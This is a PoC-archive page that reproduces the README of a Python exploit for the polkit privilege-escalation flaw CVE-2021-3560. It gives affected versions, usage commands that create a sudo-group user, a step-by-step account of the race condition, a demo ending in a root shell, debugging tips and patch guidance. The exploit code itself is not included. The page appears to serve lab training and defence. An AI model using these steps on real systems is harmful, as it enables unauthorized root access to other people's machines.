Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2021-3560 PoC — polkit 代码问题漏洞

Source
https://github.com/SeimuPVE/CVE-2021-3560_Polkit
Associated Vulnerability
Title:polkit 代码问题漏洞 (CVE-2021-3560)
Description:It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
Description
Exploit for CVE-2021-3560 Polkit Local Privilege Escalation Vulnerability
Readme
# CVE-2021-3560 Polkit Local Privilege Escalation

```
        .--.  .-"     "-.  .--.
      / .. \/  .-. .-.  \/ .. \
     | |  '|  /   Y   \  |'  | |
     | \   \  \ 0 | 0 /  /   / |
      \ '- ,\.-"`` ``"-./, -' /
       `'-' /_   ^ ^   _\ '-'`
        .--'|  \._   _./  |'--.
      /`    \   \ `~` /   /    `\
     /       '._ '---' _.'       \
    /           '~---~'           \
   /                               \
```

An automated exploit for the **CVE-2021-3560** vulnerability affecting PolicyKit (Polkit) on Linux systems.

> ⚠️ **WARNING**: This tool is intended for educational and cybersecurity training purposes only in a controlled lab environment. Unauthorized use of this exploit on systems you do not own is illegal.

## 📋 Table of Contents

- [About the Vulnerability](#-about-the-vulnerability)
- [Vulnerable Systems](#-vulnerable-systems)
- [Features](#-features)
- [Prerequisites](#-prerequisites)
- [Installation](#-installation)
- [Usage](#-usage)
- [How It Works](#-how-it-works)
- [Demonstration](#-demonstration)
- [Mitigation](#-mitigation)
- [References](#-references)

## 🔍 About the Vulnerability

**CVE-2021-3560** is a local race condition vulnerability in PolicyKit (polkit) that allows an unprivileged user to gain root privileges on vulnerable Linux systems.

### Technical Details

- **CVE ID**: CVE-2021-3560
- **Severity**: High (CVSS 7.8)
- **Type**: Race Condition / Time-of-Check Time-of-Use (TOCTOU)
- **Impact**: Local Privilege Escalation (LPE)
- **Disclosure Date**: June 2021

### Affected Versions

The vulnerability affects two branches of Polkit with different version numbering:

#### Upstream (official versions)
- **Vulnerable**: 0.113 to 0.118
- **Bug introduced**: Commit `bfa5036` (version 0.113)
- **Fixed**: Version 0.119+

#### Debian/Ubuntu fork
- **Vulnerable**: 0.105-26 and higher (up to 0.118)
- **Bug introduced**: Commit `f81d021` (version 0.105-26)
- **NOT vulnerable**: Debian 10 "buster" (0.105-25)

## 💻 Vulnerable Systems

| Distribution              | Polkit Version    | Vulnerable? |
|---------------------------|-------------------|-------------|
| **Ubuntu 20.04**          | 0.105-26ubuntu1   | ✅ Yes      |
| Ubuntu 18.04              | 0.105-20          | ❌ No       |
| **Debian testing "bullseye"** | 0.105-31+     | ✅ Yes      |
| Debian 10 "buster"        | 0.105-25          | ❌ No       |
| **RHEL 8**                | 0.115-11+         | ✅ Yes      |
| RHEL 7                    | < 0.113           | ❌ No       |
| **Fedora 21+**            | 0.113+            | ✅ Yes      |
| Fedora 20 and earlier     | < 0.113           | ❌ No       |

> 📝 **Note**: Systems with security patches applied (e.g., ubuntu1.1, deb10u1) are **not** vulnerable.

## ✨ Features

- ✅ **Automatic detection** of vulnerability across multiple distributions
- ✅ **Multi-OS support**: Debian, Ubuntu, RHEL, CentOS, Fedora, Arch Linux
- ✅ **Dependency verification** for required tools
- ✅ **Check mode**: Verify vulnerability without exploitation
- ✅ **Adaptive timing**: Automatic measurement of optimal race condition timing
- ✅ **Progress indicators**: Real-time progress display
- ✅ **Colored output**: Clear and easy-to-read interface
- ✅ **Robust error handling**: Explicit messages on failure

## 📦 Prerequisites

### Python Version

- **Python 3.6+** (compatible with older systems like CentOS 8)

### System Dependencies

The exploit requires the following tools (automatically verified):

```bash
- dbus-send      # To communicate with D-Bus
- pkexec         # Part of PolicyKit
- id             # To verify user creation
- openssl        # To generate password hash
```

### Required Service

```bash
- accountsservice  # Must be installed and active
```

## 🚀 Installation

```bash
# Clone the repository (or download the file)
git clone https://github.com/[your-repo]/CVE-2021-3560_Polkit.git
cd CVE-2021-3560_Polkit

# Make the script executable
chmod +x CVE-2021-3560_Polkit.py
```

## 📖 Usage

### Mode 1: Vulnerability Check (--check)

Check if the system is vulnerable **without** running the exploit:

```bash
python3 CVE-2021-3560_Polkit.py --check
```

**Example output**:
```
[*] ============================================================
[*] CVE-2021-3560 Polkit Vulnerability Checker
[*] ============================================================
[*] Detecting operating system...
[+] OS: Ubuntu 20.04
[*] Checking required dependencies...
[+] Found: dbus-send
[+] Found: pkexec
[+] Found: id
[+] Found: openssl
[*] Detecting Polkit version...
[+] Polkit version: 0.105-26ubuntu1
[+] ============================================================
[+] SYSTEM APPEARS VULNERABLE!
[+] ============================================================
[*] Debian/Ubuntu fork detected (vulnerable since 0.105-26)
```

### Mode 2: Exploitation

Create a privileged user:

```bash
python3 CVE-2021-3560_Polkit.py -u <username> -p <password>
```

**Example**:
```bash
python3 CVE-2021-3560_Polkit.py -u hacker -p Password123!
```

### Complete Options

```
usage: CVE-2021-3560_Polkit.py [-h] [-u USERNAME] [-p PASSWORD] [-c]

options:
  -h, --help            Show help
  -u, --username        Username to create
  -p, --password        Password for new user
  -c, --check           Check vulnerability without exploiting
```

## ⚙️ How It Works

The exploit exploits a **race condition** in PolicyKit during D-Bus request processing.

### Vulnerability Principle

1. **D-Bus Request**: The user sends a D-Bus request to create a user
2. **Authorization Check**: Polkit verifies if the user has permissions
3. **Race Condition**: If the D-Bus connection is closed during verification, Polkit treats the UID as 0 (root)
4. **User Creation**: The user is created with elevated privileges

### Exploit Steps

```
┌─────────────────────────────────────────────────────────┐
│ 1. Optimal timing measurement                          │
│    └─> Test execution to calibrate timing              │
├─────────────────────────────────────────────────────────┤
│ 2. Exploitation: User creation                         │
│    └─> Send D-Bus CreateUser request                   │
│    └─> Kill process at precise moment (race condition) │
│    └─> Verify if user created                          │
├─────────────────────────────────────────────────────────┤
│ 3. Password hash generation                            │
│    └─> Using openssl passwd -6                         │
├─────────────────────────────────────────────────────────┤
│ 4. Exploitation: Password setting                      │
│    └─> Send D-Bus SetPassword request                  │
│    └─> Kill process at precise moment (race condition) │
│    └─> Test login with password                        │
├─────────────────────────────────────────────────────────┤
│ 5. Privilege escalation                                │
│    └─> Login with created account                      │
│    └─> Use sudo if member of sudo group                │
└─────────────────────────────────────────────────────────┘
```

## 🎬 Demonstration

### Typical Exploitation Scenario

```bash
# 1. Check vulnerability
user@vulnerable:~$ python3 CVE-2021-3560_Polkit.py --check
[+] SYSTEM APPEARS VULNERABLE!

# 2. Launch exploit
user@vulnerable:~$ python3 CVE-2021-3560_Polkit.py -u pwned -p Pwn3d123!

╔═══════════════════════════════════════════════════════════╗
║       CVE-2021-3560 Polkit Privilege Escalation          ║
╚═══════════════════════════════════════════════════════════╝

[*] Creating user 'pwned' using race condition timing attack...
[*] Measuring command execution time...
[*] Command takes ~0.045s, using 0.023s timing
[*] Attempting race condition exploit, please wait...
[+] User 'pwned' created successfully! UID: 1001
[*] User is member of groups: 1001(pwned) 27(sudo)
[*] Generating password hash...
[+] Password hash generated
[*] Setting password for user 'pwned'...
[+] Password set successfully!

╔═══════════════════════════════════════════════════════════╗
║                  EXPLOIT SUCCESSFUL!                      ║
╚═══════════════════════════════════════════════════════════╝

[+] User 'pwned' created with password 'Pwn3d123!'
[*] User should be member of 'sudo' group for privilege escalation
[*] Switching to user 'pwned'...

# 3. Get root
pwned@vulnerable:~$ sudo su
root@vulnerable:~# id
uid=0(root) gid=0(root) groups=0(root)
```

## 🛡️ Mitigation

### For System Administrators

1. **Update PolicyKit**:
   ```bash
   # Debian/Ubuntu
   sudo apt update && sudo apt upgrade policykit-1
   
   # RHEL/CentOS/Fedora
   sudo yum update polkit
   # or
   sudo dnf update polkit
   ```

2. **Check version**:
   ```bash
   pkexec --version
   # Must be >= 0.119 (upstream) or patched
   ```

3. **Verify security patches**:
   ```bash
   # Debian/Ubuntu
   apt-cache policy policykit-1
   
   # RHEL/CentOS/Fedora
   rpm -q --changelog polkit | grep CVE-2021-3560
   ```

### Minimum Secure Version

- **Upstream**: ≥ 0.119
- **Ubuntu 20.04**: 0.105-26ubuntu1.**1** or higher
- **Debian 11**: 0.105-31+deb11u**1** or higher
- **RHEL 8**: polkit-0.115-11.el8_4.**1** or higher

## 📚 References

### Official Articles and Documentation

- **GitHub Security Lab**: [Privilege escalation with Polkit: How to get root on Linux with a seven-year-old bug](https://github.blog/security/vulnerability-research/privilege-escalation-polkit-root-on-linux-with-bug/)
- **Red Hat CVE**: [CVE-2021-3560](https://access.redhat.com/security/cve/cve-2021-3560)
- **MITRE CVE**: [CVE-2021-3560](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3560)
- **NVD NIST**: [CVE-2021-3560 Detail](https://nvd.nist.gov/vuln/detail/CVE-2021-3560)

### TryHackMe Resources

- **TryHackMe Room**: [Polkit CVE-2021-3560 (Practice)](https://tryhackme.com/room/polkit)

### Patches and Fixes

- **GitLab Polkit**: [Fix commit](https://gitlab.freedesktop.org/polkit/polkit/-/commit/a2bf5c9c83b6ae46cbd5c779d3055bff81ded683)

## 📝 Important Notes

### Success Rate

The exploit relies on a race condition, which means:
- ✅ Generally works in **1-20 attempts**
- ⏱️ Timing is **critical** (automatically calibrated)
- 🔄 Maximum **100 attempts** per step (configurable)
- 📡 Better success rate via **SSH** rather than local console

### Limitations

- ❌ Does **not** work on patched systems
- ❌ Requires **accountsservice** installed and active
- ❌ User must have access to **system D-Bus**
- ❌ Some environments (containers, specific VMs) may block the exploit

### Patched Versions (NOT Vulnerable)

The following versions include security patches and are **NOT vulnerable**:
- `0.105-26ubuntu1.1`, `0.105-26ubuntu1.2`, `0.105-26ubuntu1.3`, etc. (Ubuntu patched)
- `0.105-26ubuntu2.1`, `0.105-26ubuntu2.2`, etc. (Ubuntu patched)
- `0.105-31+deb11u1` (Debian 11 patched)
- `polkit-0.115-11.el8_4.1` (RHEL 8 patched)

**Note**: If your system shows as vulnerable but the exploit fails with `PermissionDenied` errors, it's likely because the version is patched. The exploit will now correctly detect these patched versions.

### Debugging

If the exploit fails:

1. **Check Python version** (if you get `TypeError: __init__() got an unexpected keyword argument 'capture_output'`):
   ```bash
   python3 --version
   # Should be 3.6 or higher
   # The script is compatible with Python 3.6+
   ```

2. **Check if version is patched**:
   ```bash
   pkexec --version
   # If you see ubuntu1.X (where X > 0), it's patched
   ```

3. **Check accountsservice**:
   ```bash
   systemctl status accounts-daemon
   ```

4. **Check D-Bus**:
   ```bash
   dbus-send --system --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames
   ```

5. **Launch from SSH** rather than local console

6. **Adjust timing** by modifying `optimal_timing` in the code

## 👤 Author

**Seimu**

## 📄 License

This project is intended for educational purposes only. Use of this code for unauthorized activities is strictly prohibited and may result in legal action.

---

> ⚠️ **Disclaimer**: The author is not responsible for any misuse of this tool. Use it only in authorized test environments.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →